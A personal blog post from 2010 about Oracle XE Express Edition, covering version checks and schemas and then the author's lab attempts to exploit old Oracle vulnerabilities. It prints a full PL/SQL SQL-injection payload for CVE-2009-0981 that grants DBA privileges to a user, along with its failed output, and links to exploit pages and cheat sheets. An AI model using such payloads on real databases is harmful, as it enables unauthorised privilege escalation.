Saturday, October 30, 2010

Oracle XE Express Edition

Recently I have to deal with Oracle XE Express Edition, and it is the right time to take some note down after doing tons of reading about the topic, especially the long study to get the difference between Oracle and Oracle XE.

Introduction
How to check the version number of an Oracle database?
(a) Use OUI (Oracle Universal Installer)
(b) select * from v$version;

What Is the Relation of a User Account and a Schema?
User accounts and schemas have a one-to-one relation. When you create a user, you are also implicitly creating a schema for that user. A schema is a logical container for the database objects (such as tables, views, triggers, and so on) that the user creates. The schema name is the same as the user name, and can be used to unambiguously refer to objects owned by the user.

Exploitation
1. CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Vulnerability
After the installation of fresh Oracle XE, I tried to play with CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection vulnerability. The exploit code from http://www.red-database-security.com/exploits/oracle_sys_lt_compressworkspacetree2.html.

The issue is about the COMPRESSWORKSPACETREE procedure sanitation issues and we can inject code into the proceduce and privilege escalation will success. The procedure has owned by SYS or WMSYS

The returned result always fail for me after several tries.
C:\Users>sqlplus

SQL*Plus: Release 10.2.0.1.0 - Production on Sat Oct 30 23:57:21 2010

Copyright (c) 1982, 2005, Oracle. All rights reserved.

Enter user-name: user1
Enter password:

Connected to:
Oracle Database 10g Express Edition Release 10.2.0.1.0 - Production

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction;
begin execute immediate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9 /
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
*
ERROR at line 6:
ORA-06550: line 6, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 6, column 1:
PL/SQL: Statement ignored
ORA-06550: line 7, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 7, column 1:
PL/SQL: Statement ignored

After several google time, I only realise there are big difference between Oracle Standard Edition and XE from http://www.dba-oracle.com/t_xe_features_oracle_express.htm. For the case, COMPRESSWORKSPACETREE procedure belongs to LT packages under Oracle Workspace Manager. Unfortunately Oracle Workspace Manager not exists in Oracle XE! This is the reason why the exploit has failed and the vulnerability not even exist in Oracle XE.

Clear. Let move on!

2. SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
The vulnerability has found in Year 2006 and I gues it cant be find in wild now. But good news is the Oracle never have any Critical Patch Unit (CPU) for Oracle XE. So, this vulnerability exists and the exploit worked well!

Further details about this issues please refer to http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html

My favor

To summarise the oracle exploitation methodology, this is my favor and one of the most comprehensive cheat sheet
http://www.red-database-security.com/wp/oracle_cheat.pdf
http://www.red-database-security.com/wp/hacking_and_hardening_oracle_XE.pdf

No comments:

Post a Comment